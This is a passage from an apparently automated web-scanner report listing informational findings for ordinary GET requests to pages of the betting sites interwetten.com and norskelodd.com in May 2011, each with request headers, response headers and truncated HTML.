...[SNIP]...

24.23. https://www.interwetten.com/en/golf-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/golf-betting

Request

GET /en/golf-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:12 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:12 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223229
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.24. https://www.interwetten.com/en/handball-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/handball-betting

Request

GET /en/handball-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:21 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:21 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:21 GMT
Connection: close
Content-Length: 226608
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.25. https://www.interwetten.com/en/ice-hockey-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/ice-hockey-betting

Request

GET /en/ice-hockey-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 225740
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.26. https://www.interwetten.com/en/livebets

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/livebets

Request

GET /en/livebets HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:07 GMT
Connection: close
Content-Length: 222401
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.27. https://www.interwetten.com/en/motorbikes-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/motorbikes-betting

Request

GET /en/motorbikes-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:02 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:01 GMT
Connection: close
Content-Length: 224123
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.28. https://www.interwetten.com/en/online-skillgames

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/online-skillgames

Request

GET /en/online-skillgames HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 75500
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...

24.29. https://www.interwetten.com/en/politics-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/politics-betting

Request

GET /en/politics-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Connection: close
Content-Length: 221965
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.30. https://www.interwetten.com/en/rugby-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/rugby-betting

Request

GET /en/rugby-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:32 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:31 GMT
Connection: close
Content-Length: 225818
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.31. https://www.interwetten.com/en/sailing-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/sailing-betting

Request

GET /en/sailing-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:29 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:28 GMT
Connection: close
Content-Length: 223288
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.32. https://www.interwetten.com/en/scratch/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/scratch/default.aspx

Request

GET /en/scratch/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:10 GMT
Content-Length: 59162
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head
...[SNIP]...

24.33. https://www.interwetten.com/en/ski-alpine-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/ski-alpine-betting

Request

GET /en/ski-alpine-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:13 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:12 GMT
Connection: close
Content-Length: 223263
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.34. https://www.interwetten.com/en/skill/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/skill/default.aspx

Request

GET /en/skill/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:06 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:05 GMT
Content-Length: 75595
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...

24.35. https://www.interwetten.com/en/sportsbook/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/sportsbook/default.aspx

Request

GET /en/sportsbook/default.aspx HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:01 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:01 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:01 GMT
Content-Length: 321963
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.36. https://www.interwetten.com/en/tennis-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/tennis-betting

Request

GET /en/tennis-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:40:08 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:40:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:40:08 GMT
Connection: close
Content-Length: 228946
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.37. https://www.interwetten.com/en/volleyball-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/volleyball-betting

Request

GET /en/volleyball-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:10 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:10 GMT
Connection: close
Content-Length: 223303
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.38. https://www.interwetten.com/en/water-polo-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/water-polo-betting

Request

GET /en/water-polo-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:19 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:19 GMT
Connection: close
Content-Length: 221931
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.39. https://www.interwetten.com/en/winter-games-betting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /en/winter-games-betting

Request

GET /en/winter-games-betting HTTP/1.1
Host: www.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __IW_COOKIE_CULTURE=en; BIGipServerPool_Web01-Web07=1717899692.20480.0000; ASP.NET_SessionId=lyn1ef10cmqagivbx2ykzc02;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 12:41:30 GMT; path=/
Set-Cookie: __IW_CLIENT_TIMEZONE=11; expires=Wed, 16-May-2012 12:41:30 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:41:29 GMT
Connection: close
Content-Length: 221922
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

24.40. https://www.norskelodd.com/no/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/

Request

GET /no/ HTTP/1.1
Host: www.norskelodd.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:11 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 100157


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.41. https://www.norskelodd.com/no/FAQ

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/FAQ

Request

GET /no/FAQ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:30 GMT
Connection: close
Content-Length: 122180
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.42. https://www.norskelodd.com/no/aboutus/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/aboutus/

Request

GET /no/aboutus/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 101153
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.43. https://www.norskelodd.com/no/charity/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/charity/

Request

GET /no/charity/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 99027
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.44. https://www.norskelodd.com/no/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/default.aspx

Request

GET /no/default.aspx HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 100157
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.45. https://www.norskelodd.com/no/fair-play/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/fair-play/

Request

GET /no/fair-play/ HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:31 GMT
Connection: close
Content-Length: 99395
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.46. https://www.norskelodd.com/no/forgotten-password

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/forgotten-password

Request

GET /no/forgotten-password HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:29 GMT
Connection: close
Content-Length: 98788
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<!-
...[SNIP]...

24.47. https://www.norskelodd.com/no/play/3Wow

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /no/play/3Wow

Request

GET /no/play/3Wow HTTP/1.1
Host: www.norskelodd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lggdnstt=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:01:32 GMT
Connection: close
Content-Length: 100360
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


